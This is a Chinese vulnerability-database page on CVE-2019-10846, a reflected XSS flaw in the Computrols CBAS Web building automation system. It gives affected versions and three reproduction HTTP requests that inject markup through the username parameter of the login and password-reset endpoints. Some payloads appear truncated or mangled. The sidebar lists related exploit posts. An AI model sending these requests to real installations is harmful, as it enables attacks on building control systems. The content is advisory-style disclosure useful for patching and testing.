（CVE-2019-10846）Computrols_CBAS_Web反射型xss-棉花糖会员站

# （CVE-2019-10846）Computrols CBAS Web反射型xss

======

一、漏洞简介
————

Computrols CBAS Web是美国Computrols公司的一套楼宇自动化系统

二、漏洞影响
————

Computrols CBAS Web\<=19.0.0 三、复现过程 ------------ ### 1、 POST /cbas/index.php?m=auth&a=verifyid HTTP/1.1 username=">&submit_button=Send+Me+a+New+Password+Via+Email

### 2、

POST /cbas/index.php?m=auth&a=login HTTP/1.1

username=”>htmlinjection&password=&challenge=60753c1b5e449de80e21472b5911594d&response=e16371917371b8b70529737813840c62

### 3、

GET /cbas/index.php?m=auth&a=login&username=”>my milkshake brings all the boys to the yard.&password=damn_right HTTP/1.1

文章版权归作者所有，未经允许请勿转载。

THE END

国内漏洞库

（CVE-2019-10846）Computrols_CBAS_Web反射型xss

请登录后发表评论

1cs提权插件PostExpKit-202410（来源：潇湘信安）

2xscan xss漏扫工具

3红队VS蓝队：网络攻防实战技术解析随书资源

4eking管理易Html5Upload接口任意文件上传

5一些安全技术相关文档存档

6Cloudlog delete_oqrs_line 未授权SQL注入